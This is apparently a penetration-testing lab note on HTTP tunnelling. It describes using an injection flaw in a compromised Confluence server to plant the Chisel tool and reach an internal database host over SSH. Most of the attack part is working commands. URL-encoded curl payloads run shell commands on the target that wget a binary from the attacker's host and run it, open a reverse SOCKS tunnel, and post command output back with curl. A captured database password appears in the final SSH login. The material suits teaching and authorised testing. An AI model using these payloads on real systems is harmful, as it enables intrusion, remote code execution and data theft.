HTTP Tunneling

Our scenario:

• We have compromised CONFLUENCE01 and can execute commands through HTTP requests.

• A DPI solution (FIREWALL/INSPECTOR) is blocking all outbound traffic except HTTP, and only TCP port 8090 is open on CONFLUENCE01. This means we can use tools like curl and wget.

• As a result, a standard reverse shell or an SSH remote port forward, which doesn't follow the HTTP format, would be blocked by the DPI.

• We have obtained credentials for PGDATABASE01.

• Our goal is to SSH directly from Kali to CONFLUENCE01.

chisel is an HTTP tunneling tool that encapsulates data within HTTP packets and uses SSH for encryption, allowing secure data transmission through firewalls or restrictive networks.

1. We’ll run a Chisel server on the Kali machine to accept a connection from a client on CONFLUENCE01.

2. The server will bind a SOCKS proxy port, tunnel traffic through an SSH-encrypted HTTP connection, and the client will forward it to its destination.

Chisel tunnels traffic over HTTP, bypassing DPI. The Kali Chisel server listens on TCP port 1080 (SOCKS proxy). Traffic sent to this port is encapsulated in HTTP, sent to the client, and forwarded to its destination.

# modify the vulnerability in order to transfer the binary on CONFLUENCE01
# command: wget 192.168.45.235/chisel -O /tmp/chisel && chmod +x /tmp/chisel
$ curl http://192.168.246.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.45.235/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/

# start the chisel server (reverse port forward) on Kali
$ chisel server --port 8080 --reverse
2025/04/20 16:25:09 server: Reverse tunnelling enabled
2025/04/20 16:25:09 server: Fingerprint CaRdMXQ8pQ4mwvVx3pGUSV5IrPsCf3BdDnoEoAPU2cU=
2025/04/20 16:25:09 server: Listening on http://0.0.0.0:8080

# connent from the client to the server
# command: /tmp/chisel client 192.168.45.235:8080 R:socks > /dev/null 2>&1 &
$ curl http://192.168.246.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.45.235:8080%20R:socks%27%29.start%28%29%22%29%7D/

We get a new connection on the Chisel server.

$ chisel server --port 8080 --reverse
...
2025/04/20 16:29:12 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

$ sudo netstat -ntlp | grep 1080
tcp  0  0 127.0.0.1:1080  0.0.0.0:*   LISTEN  930/./chisel

In case of errors.

# check traffic for error messages
$ sudo tcpdump -nvvvXi tun0 tcp port 8080

# command: /tmp/chisel client 192.168.118.4:8080 R:socks &> /tmp/output; curl --data @/tmp/output http://192.168.118.4:8080/
$ curl http://192.168.246.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.45.235:8080%20R:socks%20%26%3E%20/tmp/output%20%3B%20curl%20--data%20@/tmp/output%20http://192.168.45.235:8080/%27%29.start%28%29%22%29%7D/

Our SOCKS proxy on Kali listens at 127.0.0.1:1080. To connect SSH through it to PGDATABASE01, we'll use SSH’s ProxyCommand option, which lets us define a proxy-aware connection method. While OpenBSD Netcat supports this natively, Kali’s version doesn’t — so we’ll use ncat, the Nmap team’s Netcat alternative, which does.

We’ll pass an ncat command to ProxyCommand, telling it to use the SOCKS5 proxy at 127.0.0.1:1080. The %h and %p tokens are placeholders SSH replaces with the target host and port before executing the command.

$ ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.246.215
...
database_admin@10.4.246.215's password: #sqlpass123
...
database_admin@pgdatabase01:~$